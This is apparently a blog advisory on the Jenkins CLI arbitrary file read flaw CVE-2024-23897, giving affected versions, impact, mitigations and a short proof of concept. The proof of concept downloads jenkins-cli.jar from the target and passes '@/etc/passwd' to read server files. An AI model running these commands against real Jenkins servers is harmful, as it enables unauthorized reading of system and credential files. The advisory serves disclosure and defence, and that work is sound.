CVE-2024-23897 – Jenkins Arbitrary File Read Vulnerability

Posted on

Vendor Description:-

Jenkins is a self-contained, open source automation server which can be used to automate all sorts of tasks related to building, testing, and delivering or deploying software.

Jenkins can be installed through native system packages, Docker, or even run standalone by any machine with a Java Runtime Environment (JRE) installed.

Vulnerability Details:-

Jenkins CVE-2024-23897: Arbitrary File Read Vulnerability Leading to RCE

Jenkins uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file’s contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it.

This allows attackers to read arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process.

Attackers with Overall/Read permission can read entire files.

Attackers without Overall/Read permission can read the first few lines of files. The number of lines that can be read depends on available CLI commands. As of the publication of this advisory, the Jenkins security team has found ways to read the first three lines of files in recent releases of Jenkins without having any plugins installed and has not identified any plugins that would increase this line count.

Impact

CVE-2024-23897 is a critical vulnerability in Jenkins, specifically in the command-line interface (CLI). The args4j library’s expandAtFiles method was misused, resulting in this issue. The vulnerability allows unauthorized attackers to view any file on the server, including sensitive binary data such as cryptographic keys. Exploiting this problem may lead to:

  • Unauthorized Data Access: Attackers can access essential configuration or private files, risking data confidentiality.
  • Service Disruption: CI/CD workflows are disrupted owing to a system compromise.
  • Privilege Escalation: Using accessible files to infiltrate other systems or raise privileges.

Mitigation

To mitigate this vulnerability, companies should implement the following measures:

  • Upgrade Jenkins to the most recent version, which includes a patch for this vulnerability. Regular upgrades are crucial to preserving security.​
  • To restrict CLI access, disable the vulnerable functionality by setting the Java system parameter hudson.cli.CLICommand.allowAtSyntax=false.
  • Alternatively, disable CLI access if not needed for operations.
  • Tighten rights: Ensure that only trustworthy users have access to Jenkins, with only the minimum rights required for their responsibilities. Where feasible, disable anonymous access.
  • To harden system configurations, implement input validation techniques to limit potential exploits.
  • Use firewalls and monitoring tools to detect unusual CLI activity.

POC

First Check the Jenkins Version Using curl

curl -I http://{{ip-addr}}:8080

image 5

The attacker can continue to exploit the system if the version corresponds to one that is known to be vulnerable (prior to 2.441 versions, depending on the CVE specifics). The target system in this case is 2.441, making it susceptible.

Download Jenkins CLI Using wget

Jenkins provides a command-line interface (CLI) that attackers can exploit if left exposed. Attackers can download the jenkins-cli.jar file to interact with the Jenkins instance remotely.

To download the CLI tool:

wget http://{ip-addr}:8080/jnlpJars/jenkins-cli.jar

This command downloads the jenkins-cli.jar file, which attackers will use to execute arbitrary commands on the server.

or you can download the jenkins-cli.jar file with the direct put URL

image 6

Exploit the RCE via Jenkins CLI

With the CLI tool in hand, the attacker can use it to run remote commands on the vulnerable Jenkins server. An example of a simple exploit involves using the CLI to execute a command that reads files on the system or verifies the current Jenkins user permissions.

However, an attacker can exploit the vulnerability to access sensitive system files like /etc/passwd.

For example:

java -jar jenkins-cli.jar -s http://jenkins-server:8080 -http connect-node “@/etc/passwd”

image 7

POC Video:-

Reference:

https://www.firecompass.com/jenkins-cve-2024-23897-vulnerability-exposed/

Leave a Reply

Your email address will not be published. Required fields are marked *